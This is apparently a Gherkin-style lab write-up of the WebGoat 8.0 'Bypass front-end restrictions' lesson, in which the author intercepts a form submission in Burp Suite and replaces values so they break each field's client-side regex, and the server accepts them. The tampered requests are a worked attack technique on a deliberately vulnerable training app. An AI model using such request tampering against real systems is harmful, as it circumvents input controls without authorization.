# language: en

Feature: Bypass front-end restrictions
  From WebGoat Project
  From Client side
  With my username Skhorn

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am running WebGoat 8.0 in Docker container webgoat/webgoat-8.0:
  """
  openjdk:8
  """
  And I am using Firefox 52.7.3 (64-bit)
  And I am runnin Burp Suite Community edition v1.7.30
  Given a Java web site with several fields
  """
  URL: WebGoat/start.mvc#lesson/BypassRestrictions.lesson/1
  Message: Validations
  Objective 1: Bypass the regex validations of all the fields
  Evidence: Seven input elements
  """

Scenario Outline: Information gathering
Another way to control user input is using regular expressions
  Given several input element with regexp validations
  And where each input is like this:
  """
  # Field 1:
  <strong>Field 1:</strong> exactly three lowercase characters(^[a-z]{3}$)
    ...
    ...
  <textarea cols="25" name="field1" rows="1">abc</textarea>

  # Field 2:
  <strong>Field 2:</strong> exactly three digits(^[0-9]{3}$)</div>
    ...
    ...
  <textarea cols="25" name="field2" rows="1">123</textarea>

  # Field 3:
  <strong>Field 3:</strong> letters, numbers, and space only(^[a-zA-Z0-9 ]*$)
    ...
    ...
  <textarea cols="25" name="field3" rows="1">abc 123 ABC</textarea>

  # Field 4:
  <strong>Field 4:</strong> enumeration of numbers \
  (^(one|two|three|four|five|six|seven|eight|nine)$)
    ...
    ...
  <textarea cols="25" name="field4" rows="1">seven</textarea>

  # Field 5:
  <strong>Field 5:</strong> simple zip code (^\d{5}$)
    ...
    ...
  <textarea cols="25" name="field5" rows="1">01101</textarea>

  # Field 6:
  <strong>Field 6:</strong> zip with optional dash four (^\d{5}(-\d{4})?$)
    ...
    ...
  <textarea cols="25" name="field6" rows="1">90210-1111</textarea>

  # Field 7:
  <strong>Field 7:</strong> US phone number with or without dashes \
  (^[2-9]\d{2}-?\d{3}-?\d{4}$)
    ...
    ...
  <textarea cols="25" name="field7" rows="1">301-604-4882</textarea>
  """
  When I submit the data as it is
  And using BurpSuite to intercept the request
  Then I should see the original request like this:
  """
  POST /WebGoat/BypassRestrictions/frontendValidation/ HTTP/1.1
  Host: 192.168.1.116:8080
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 \
  Firefox/52.0
    ...
    ...
    ...
  field1=abc&field2=123&field3=abc+123+ABC&field4=seven&field5=01101&\
  field6=90210-1111&field7=301-604-4882&error=0
  """

Scenario: Bypassing validation
  """
  What's the purpose of restricting user input at client-side
  While there is no validation of it an the server-side?
  """
  When I modify the values of the original request
  And use values that bypasses the regexp validations

  # Original sent data
  | Type | Element | Value        |
  | Body | field1  | abc          |
  | Body | field2  | 123          |
  | Body | field3  | abc+123+ABC  |
  | Body | field4  | seven        |
  | Body | field5  | 01101        |
  | Body | field6  | 90210-1111   |
  | Body | field7  | 301-604-4882 |
  | Body | error   | 0            |

  # Tampered data
  | Type | Element | Value           |
  | Body | field1  | abcz            |
  | Body | field2  | 1234            |
  | Body | field3  | abc+123+ABC+*** |
  | Body | field4  | neves           |
  | Body | field5  | zipcode         |
  | Body | field6  | zipcode-opt     |
  | Body | field7  | celuco-numba    |
  | Body | error   | 0               |

  # Tampered request
  And use them in burp
  """
  POST /WebGoat/BypassRestrictions/frontendValidation/ HTTP/1.1
  Host: 192.168.1.116:8080
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 \
   Firefox/52.0
  ...
  field1=abcz&field2=1234&field3=abc+123+ABC+***&field4=neves&
  field5=zipcode&field6=zipcode-opt&field7=celuco-numba&error=0
  """
  And as data was not validated in server-side
  Then I should validate the challenge
  """
  HTTP/1.1 200
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
    ...
    ...
    ...
  {
    "lessonCompleted" : true,
    "feedback" : "Congratulations. \
    You have successfully completed the assignment.",
    "output" : null
  }
  """
